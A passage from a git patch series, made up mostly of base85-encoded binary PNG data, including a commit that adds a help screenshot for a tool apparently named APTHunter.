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 literal 0 HcmV?d00001 -- 2.34.1 From 830c1a6159bf480fa16b91eafe54cbe1ee42f097 Mon Sep 17 00:00:00 2001 From: pex7hfbnt <1584881064@qq.com> Date: Wed, 16 Oct 2024 23:45:01 +0800 Subject: [PATCH 11/13] ADD file via upload --- source/screenshot/APTHunter-Help.png | Bin 0 -> 88327 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 source/screenshot/APTHunter-Help.png diff --git a/source/screenshot/APTHunter-Help.png b/source/screenshot/APTHunter-Help.png new file mode 100644 index 0000000000000000000000000000000000000000..c5a495b7d3c4edb49eb9067c12a1f1b6664ea6a9 GIT binary patch literal 88327 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 